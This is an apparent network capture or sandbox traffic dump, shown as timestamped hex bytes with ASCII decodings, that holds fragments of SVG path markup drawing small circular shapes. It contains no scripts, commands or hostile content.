                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC1973INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC1989INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                                                                                                                          Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2005INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2021INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2037INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2053INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2069INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2085INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                                          Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2101INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2117INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                                                                                                                          Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2133INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2149INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2165INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                          Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2181INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                                                                                                                          Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2197INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2213INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2229INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
